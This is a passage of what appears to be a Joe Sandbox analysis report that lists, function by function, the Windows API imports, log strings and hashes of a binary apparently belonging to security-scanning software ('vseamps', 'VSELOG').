RegCloseKey.ADVAPI32 ref: 0000000140003057
LeaveCriticalSection.KERNEL32 ref: 0000000140003064

Strings

action, xrefs: 0000000140003020
SYSTEM\CurrentControlSet\Services\vseamps\Parameters, xrefs: 0000000140002FD5
?, xrefs: 0000000140002FFE

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: CriticalSection$EnterLeave$CloseCreateValue
String ID: ?$SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
API String ID: 93015348-1041928032
Opcode ID: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
Instruction ID: 955b1bef443a43e40f7389cebc0d05d3cfed999bfec6c75915e9fb821c1678e4
Opcode Fuzzy Hash: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
Instruction Fuzzy Hash: E3714676211A4082E762CB26F8507DA73A5F78D7E4F141226FB6A4B7F4DB3AC485C700

Function 0000000140002B40 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 141libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 0000000140002B91
GetProcAddress.KERNEL32 ref: 0000000140002BAD
GetProcAddress.KERNEL32 ref: 0000000140002BC8
GetProcAddress.KERNEL32 ref: 0000000140002BE3
EnterCriticalSection.KERNEL32 ref: 0000000140002C0D
LeaveCriticalSection.KERNEL32 ref: 0000000140002C9A
EnterCriticalSection.KERNEL32 ref: 0000000140002CAF
LeaveCriticalSection.KERNEL32 ref: 0000000140002D2D

Strings

vseqrtRelease, xrefs: 0000000140002BBA
vseqrt.dll, xrefs: 0000000140002B7E
vseqrtAdd, xrefs: 0000000140002BD5
vseqrtInit, xrefs: 0000000140002BA3

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: CriticalSection$AddressProc$EnterLeave$LibraryLoad
String ID: vseqrt.dll$vseqrtAdd$vseqrtInit$vseqrtRelease
API String ID: 3682727354-300733478
Opcode ID: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
Instruction ID: 5756194132ff8dd7ec1522ad033bffa79c37130547d86cec9d6c1639cfe77c95
Opcode Fuzzy Hash: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
Instruction Fuzzy Hash: 8C710175220B4186EB52DF26F894BC533A4F78CBE4F441226EA598B3B4DF3AC945C740

Function 00000001400033E0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 126memorytimeCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140003406
SetWaitableTimer.KERNEL32 ref: 0000000140003432
#4.VSELOG ref: 000000014000346A
GetProcessHeap.KERNEL32 ref: 000000014000351C
HeapReAlloc.KERNEL32 ref: 0000000140003531
GetProcessHeap.KERNEL32 ref: 0000000140003539
HeapAlloc.KERNEL32 ref: 0000000140003547
#4.VSELOG ref: 00000001400035DD
LeaveCriticalSection.KERNEL32 ref: 00000001400035E9
LeaveCriticalSection.KERNEL32 ref: 00000001400035FA

Strings

amps_Init: iFlags=%d, pid=%d, sid=%d, xrefs: 0000000140003452
amps_Init: done, pHandle=%p, xrefs: 00000001400035CC

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: Heap$CriticalSection$AllocLeaveProcess$EnterTimerWaitable
String ID: amps_Init: done, pHandle=%p$amps_Init: iFlags=%d, pid=%d, sid=%d
API String ID: 2587151837-1427723692
Opcode ID: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
Instruction ID: a7c4065e0455d4df5ce4727384a6dec66c16779501c9bb3b2af2b379a082be6c
Opcode Fuzzy Hash: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
Instruction Fuzzy Hash: 9F5114B5225B4082FB13CB27F8847D963A5F78CBD0F445525BB4A4B7B8DB7AC4448700

Function 0000000140004D10 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 81libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000000140004D43
GetProcAddress.KERNEL32 ref: 0000000140004D62
GetFileAttributesW.KERNEL32 ref: 0000000140004DE9
LoadLibraryW.KERNEL32 ref: 0000000140004DF7
GetCurrentDirectoryW.KERNEL32 ref: 0000000140004E1C
SetCurrentDirectoryW.KERNEL32 ref: 0000000140004E27
LoadLibraryW.KERNEL32 ref: 0000000140004E30
SetCurrentDirectoryW.KERNEL32 ref: 0000000140004E41

Strings

SetDllDirectoryW, xrefs: 0000000140004D58
kernel32.dll, xrefs: 0000000140004D3C

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: CurrentDirectory$LibraryLoad$AddressAttributesFileHandleModuleProc
String ID: SetDllDirectoryW$kernel32.dll
API String ID: 3184163350-3826188083
Opcode ID: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
Instruction ID: 3ea874f08b0d6ae9fbaedd0e680489d05007b391355801732f4c7fbd06edc96d
Opcode Fuzzy Hash: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
Instruction Fuzzy Hash: FD41F6B1218A8582EB22DF12F8547DA73A5F79D7D4F400125EB8A0BAB5DF7EC548CB40

Function 0000000140004BA0 Relevance: 18.1, APIs: 9, Strings: 3, Instructions: 80memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32 ref: 0000000140004BE7
GetProcessHeap.KERNEL32 ref: 0000000140004BF6
HeapAlloc.KERNEL32 ref: 0000000140004C04
lstrlenW.KERNEL32 ref: 0000000140004C3E
GetProcessHeap.KERNEL32 ref: 0000000140004C4D
HeapAlloc.KERNEL32 ref: 0000000140004C5B
lstrlenW.KERNEL32 ref: 0000000140004C8E
GetProcessHeap.KERNEL32 ref: 0000000140004C9D
HeapAlloc.KERNEL32 ref: 0000000140004CAB

Strings

Security=impersonation static true, xrefs: 0000000140004C80, 0000000140004CBE
ampIfEp, xrefs: 0000000140004C29, 0000000140004C6E
ncalrpc, xrefs: 0000000140004BAF, 0000000140004C17

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: Heap$AllocProcesslstrlen
String ID: Security=impersonation static true$ampIfEp$ncalrpc
API String ID: 3424473247-996641649
Opcode ID: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
Instruction ID: 5475aedf582102907cd33adbfaf34f9b11ebc9e91273ce6565e0ea0cfbbdf015
Opcode Fuzzy Hash: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
Instruction Fuzzy Hash: FE3137B062A74082FB03CB53BD447E962A5E75DBD8F554019EB0E0BBB6DBBEC1558700

Function 000000014000A740 Relevance: 16.9, APIs: 11, Instructions: 354COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32 ref: 000000014000A7AA
GetLastError.KERNEL32 ref: 000000014000A7BA
MultiByteToWideChar.KERNEL32 ref: 000000014000A874
MultiByteToWideChar.KERNEL32 ref: 000000014000A921
LCMapStringW.KERNEL32 ref: 000000014000A944
LCMapStringW.KERNEL32 ref: 000000014000A98D
LCMapStringW.KERNEL32 ref: 000000014000AA24
WideCharToMultiByte.KERNEL32 ref: 000000014000AA65
LCMapStringA.KERNEL32 ref: 000000014000AB13
LCMapStringA.KERNEL32 ref: 000000014000ABC6
LCMapStringA.KERNEL32 ref: 000000014000AC4C

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: String$ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1775797328-0
Opcode ID: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
Instruction ID: 7820e0e177e3580e7fbac086e7e180635334a87404cd07a7d6eea56579f34d7e
Opcode Fuzzy Hash: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
Instruction Fuzzy Hash: 7CE18BB27007808AEB66DF26A54079977E1F74EBE8F144225FB6957BE8DB38C941C700

Function 0000000140009C30 Relevance: 16.6, APIs: 11, Instructions: 150COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C52
GetLastError.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C6C
GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C91
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CD4
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CF2
GetEnvironmentStrings.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D09
MultiByteToWideChar.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D37
FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D73
FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009E19

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
String ID:
API String ID: 1232609184-0
Opcode ID: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
Instruction ID: a97fb2b29f1dbdd40f84dfefdd532c69b8fe37edd6617e3b903b273dff31e607
Opcode Fuzzy Hash: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
Instruction Fuzzy Hash: 9851AEB164564046FB66DF23B8147AA66D0BB4DFE0F484625FF6A87BF1EB78C4448300

Function 0000000140002740 Relevance: 16.6, APIs: 10, Strings: 1, Instructions: 129memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140001A30: EnterCriticalSection.KERNEL32 ref: 0000000140001AA6
Part of subcall function 0000000140001A30: LeaveCriticalSection.KERNEL32 ref: 0000000140001B30
Part of subcall function 0000000140001A30: EnterCriticalSection.KERNEL32 ref: 0000000140001B48
Part of subcall function 0000000140001A30: LeaveCriticalSection.KERNEL32 ref: 0000000140001BC9
Part of subcall function 0000000140001A30: EnterCriticalSection.KERNEL32 ref: 0000000140001BE6

EnterCriticalSection.KERNEL32 ref: 00000001400027B2
LeaveCriticalSection.KERNEL32 ref: 000000014000286E
GetProcessHeap.KERNEL32 ref: 000000014000287F
HeapFree.KERNEL32 ref: 000000014000288D
GetProcessHeap.KERNEL32 ref: 000000014000289D
HeapFree.KERNEL32 ref: 00000001400028AB
GetProcessHeap.KERNEL32 ref: 00000001400028BB
HeapFree.KERNEL32 ref: 00000001400028C9
GetProcessHeap.KERNEL32 ref: 00000001400028D9
HeapFree.KERNEL32 ref: 00000001400028E7

Strings

H, xrefs: 000000014000278C

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: Heap$CriticalSection$EnterFreeProcess$Leave
String ID: H
API String ID: 2107338056-2852464175
Opcode ID: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
Instruction ID: c1f1c0cc251b461ea163c40135a27997c94af954a8846501eddf5ed74a01cb36
Opcode Fuzzy Hash: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
Instruction Fuzzy Hash: D5513B76216B4086EBA2DF63B84439A73E5F74DBD0F098128EB9D87765EF39C4558300

Function 0000000140003200 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 100timeCOMMON

Download Yara Rule

APIs

#4.VSELOG ref: 0000000140003242
EnterCriticalSection.KERNEL32 ref: 0000000140003257
LeaveCriticalSection.KERNEL32 ref: 00000001400032D9
#4.VSELOG ref: 0000000140003353

Part of subcall function 0000000140002B40: LoadLibraryW.KERNEL32 ref: 0000000140002B91
Part of subcall function 0000000140002B40: GetProcAddress.KERNEL32 ref: 0000000140002BAD
Part of subcall function 0000000140002B40: GetProcAddress.KERNEL32 ref: 0000000140002BC8
Part of subcall function 0000000140002B40: GetProcAddress.KERNEL32 ref: 0000000140002BE3
Part of subcall function 0000000140002B40: EnterCriticalSection.KERNEL32 ref: 0000000140002C0D
Part of subcall function 0000000140002B40: LeaveCriticalSection.KERNEL32 ref: 0000000140002C9A
Part of subcall function 0000000140002B40: EnterCriticalSection.KERNEL32 ref: 0000000140002CAF
Part of subcall function 0000000140002B40: LeaveCriticalSection.KERNEL32 ref: 0000000140002D2D

#4.VSELOG ref: 0000000140003389
SetWaitableTimer.KERNEL32 ref: 00000001400033BE

Strings

fnCallback: hScan=%d, quarantine, result %d, xrefs: 000000014000333F
fnCallback: hScan=%d, evId=%d, context=%p, xrefs: 000000014000323B
fnCallback: hScan=%d, putting event %d into listening threads queues, xrefs: 0000000140003372

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: CriticalSection$AddressEnterLeaveProc$LibraryLoadTimerWaitable
String ID: fnCallback: hScan=%d, evId=%d, context=%p$fnCallback: hScan=%d, putting event %d into listening threads queues$fnCallback: hScan=%d, quarantine, result %d
API String ID: 1322048431-2685357988
Opcode ID: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
Instruction ID: ba1df9fb3c509f4e652456910b8147ac8aac6905a945631cefe2604201aedb7e
Opcode Fuzzy Hash: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
Instruction Fuzzy Hash: 645106B5214B4181EB13CF16F880BD923A4E79DBE4F445622BB594B6B4DF3AC584C740

Function 0000000140003D50 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 75timeCOMMON

Download Yara Rule

APIs

#4.VSELOG(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003D84
EnterCriticalSection.KERNEL32(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003DA3
#4.VSELOG(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003E19
LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003E25
#4.VSELOG(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003E66
SetWaitableTimer.KERNEL32 ref: 0000000140003EA6

Strings

doCleanup: pid %d, marking the cAmpEntry pointer for deletion, xrefs: 0000000140003E58
doCleanup: pid %d, removing cAmpEntry, index is %d, xrefs: 0000000140003E08
doCleanup: enter, cAmpEntry %p, xrefs: 0000000140003D76

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: CriticalSection$EnterLeaveTimerWaitable
String ID: doCleanup: enter, cAmpEntry %p$doCleanup: pid %d, marking the cAmpEntry pointer for deletion$doCleanup: pid %d, removing cAmpEntry, index is %d
API String ID: 2984211723-3002863673
Opcode ID: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
Instruction ID: 6ce834a9fa2c46ab9e722fc1bcf1c858386cde021ca473021475461b430fce50
Opcode Fuzzy Hash: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
Instruction Fuzzy Hash: 9B4101B5214A8591EB128F07F880B9863A4F78CBE4F495226FB1D0BBB4DB7AC591C710

Function 00000001400021A0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 65COMMON

Download Yara Rule

APIs

#4.VSELOG ref: 00000001400021D4
OpenProcess.KERNEL32 ref: 00000001400021F7
#4.VSELOG ref: 000000014000223A
WaitForMultipleObjects.KERNEL32 ref: 000000014000224F
CloseHandle.KERNEL32 ref: 000000014000225A
#4.VSELOG ref: 0000000140002294

Strings

doMonitor: end process id=%d, result from WaitForMultipleObjects=%d, xrefs: 0000000140002283
doMonitor: monitoring process id=%d, xrefs: 000000014000222C
fnMonitor: monitor thread for ctx %p, xrefs: 00000001400021C6

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: CloseHandleMultipleObjectsOpenProcessWait
String ID: doMonitor: end process id=%d, result from WaitForMultipleObjects=%d$doMonitor: monitoring process id=%d$fnMonitor: monitor thread for ctx %p
API String ID: 678758403-4129911376
Opcode ID: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
Instruction ID: f397f01a700ed75a1720fb106c04e764a2ecaef09c032a262f7e58a7780e1373
Opcode Fuzzy Hash: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
Instruction Fuzzy Hash: B63107B6610A4582EB12DF57F84079963A4E78CBE4F498122FB1C0B7B4DF3AC585C710

Function 0000000140001750 Relevance: 15.1, APIs: 12, Instructions: 133memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32 ref: 0000000140001797
GetProcessHeap.KERNEL32 ref: 00000001400017A6
HeapAlloc.KERNEL32 ref: 00000001400017B4
lstrlenW.KERNEL32 ref: 00000001400017EC
GetProcessHeap.KERNEL32 ref: 00000001400017FB
HeapAlloc.KERNEL32 ref: 0000000140001809
lstrlenW.KERNEL32 ref: 000000014000183F
GetProcessHeap.KERNEL32 ref: 000000014000184E
HeapAlloc.KERNEL32 ref: 000000014000185C
lstrlenW.KERNEL32 ref: 000000014000188D
GetProcessHeap.KERNEL32 ref: 000000014000189C
HeapAlloc.KERNEL32 ref: 00000001400018AA

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: Heap$AllocProcesslstrlen
String ID:
API String ID: 3424473247-0
Opcode ID: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
Instruction ID: a11592c0991bfac199573d0d609f53e0c1426f0a5ad78f28403dae96cf8670eb
Opcode Fuzzy Hash: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
Instruction Fuzzy Hash: C8513AB6701640CAE666DFA3B84479A67E0F74DFC8F588428AF4E4B721DA38D155A700

Function 0000000140012C70 Relevance: 14.4, APIs: 4, Strings: 4, Instructions: 415COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0000000140011270: RtlLookupFunctionEntry.KERNEL32 ref: 00000001400112F1

__GetUnwindTryBlock.LIBCMT ref: 0000000140012CDD
__SetUnwindTryBlock.LIBCMT ref: 0000000140012D05
__GetUnwindTryBlock.LIBCMT ref: 0000000140012D15
_SetThrowImageBase.LIBCMT ref: 0000000140012DA6

Strings

csm, xrefs: 0000000140012DC1
bad exception, xrefs: 0000000140012E4A
csm, xrefs: 0000000140012E97
csm, xrefs: 0000000140012D2F

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: BlockUnwind$BaseEntryFunctionImageLookupThrow
String ID: bad exception$csm$csm$csm
API String ID: 3766904988-820278400
Opcode ID: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
Instruction ID: ec44bdd804db6766ea80e989845e9f4c5c79a3e5de674617e5e8a62493c248da
Opcode Fuzzy Hash: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
Instruction Fuzzy Hash: 2202C17220478086EB66DB27A4447EEB7A5F78DBC4F484425FF894BBAADB39C550C700

Function 0000000140004750 Relevance: 13.6, APIs: 9, Instructions: 80sleepCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140004A0F
LeaveCriticalSection.KERNEL32 ref: 0000000140004A1D
WaitForMultipleObjects.KERNEL32 ref: 0000000140004A44
Sleep.KERNEL32 ref: 0000000140004A75
EnterCriticalSection.KERNEL32 ref: 0000000140004A7F
SetEvent.KERNEL32 ref: 0000000140004AC5
ResetEvent.KERNEL32 ref: 0000000140004ACF
LeaveCriticalSection.KERNEL32 ref: 0000000140004AD9
WaitForMultipleObjects.KERNEL32 ref: 0000000140004B0D

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: CriticalSection$EnterEventLeaveMultipleObjectsWait$ResetSleep
String ID:
API String ID: 2707001247-0
Opcode ID: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
Instruction ID: f9d573460b216e7eeefce72b36cf093424a31f8579033a03516ac6dab9ef0102
Opcode Fuzzy Hash: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
Instruction Fuzzy Hash: BC3159B6304A4492EB22DF22F44479AB360F749BE4F444121EB9E07AB4DF39D489C708

Function 00007FFE13204804 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FFE13204861

Part of subcall function 00007FFE13206BC4: __GetUnwindTryBlock.LIBCMT ref: 00007FFE13206C07
Part of subcall function 00007FFE13206BC4: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FFE13206C2C

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FFE13204939
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FFE13204B87
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFE13204C94

Strings

csm, xrefs: 00007FFE1320487B
csm, xrefs: 00007FFE1320495C
csm, xrefs: 00007FFE132048E2

Memory Dump Source

Source File: 00000004.00000002.2311314685.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2311271276.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311341205.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311366130.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311387307.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

